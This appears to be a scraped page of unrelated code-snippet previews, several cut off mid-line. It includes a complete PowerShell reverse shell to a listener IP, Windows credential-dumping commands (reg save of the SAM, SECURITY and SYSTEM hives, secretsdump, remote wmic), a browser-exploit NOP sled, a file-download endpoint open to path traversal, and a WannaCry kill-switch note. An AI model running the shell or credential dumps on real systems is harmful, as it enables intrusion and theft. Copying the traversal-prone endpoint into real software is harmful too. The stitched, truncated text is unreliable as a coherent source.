time.google.com
time1.google.com
time2.google.com
time3.google.com
| powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" |
| [Route("api/[controller]")] | |
| public class FilesController : ControllerBase | |
| { | |
| [HttpGet] | |
| public async Task<IActionResult> Download(string filename) | |
| { | |
| if (filename == null) | |
| return Content("filename not present"); | |
| var path = Path.Combine(Directory.GetCurrentDirectory(), "wwwroot", "download", filename); |
| <script> | |
| function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } } | |
| var sc = []; | |
| for (var i=0; i<0x480; i++) { | |
| sc.push(0x90); | |
| } | |
| //sc.push(0xcc); | |
| //sc.push(0xeb); | |
| //sc.push(0xfe); |
| var snapeData = [new Date()]; | |
| var qu = $; | |
| var _time = null; | |
| var snape = setInterval(function() { | |
| _time = qu('.pane-chat-header .chat-body .chat-main+div span'); | |
| if ( !!_time && snapeData[snapeData.length - 1].status !== _time.title) { | |
| snapeData.push({ | |
| status: _time.title, |
| #!/usr/bin/env python | |
| # encoding:utf-8 | |
| # Author : WangYihang | |
| # Date : 2017/10/03 | |
| # Email : [email protected] | |
| # Comment : to solve XDCTF-2017-WEB-Upload | |
| import string | |
| import itertools | |
| import os |
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).update: A minor variant of the viru
SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| reg.exe save hklm\sam c:\temp\sam.save | |
| reg.exe save hklm\security c:\temp\security.save | |
| reg.exe save hklm\system c:\temp\system.save | |
| secretsdump.py -sam sam.save -security security.save -system system.save LOCAL | |
| #https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py | |
| #Do this remotely | |
| wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save" |
| #!/usr/bin/python2 | |
| #####################################NOTICE###################################### | |
| ### This program is free software: you can redistribute it and/or modify ### | |
| ### it under the terms of the GNU General Public License as published by ### | |
| ### the Free Software Foundation, either version 3 of the License, or ### | |
| ### (at your option) any later version. ### | |
| ### This program is distributed in the hope that it will be useful, ### | |
| ### ### | |
| ### but WITHOUT ANY WARRANTY; without even the implied warranty of ### | |
| ### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ### |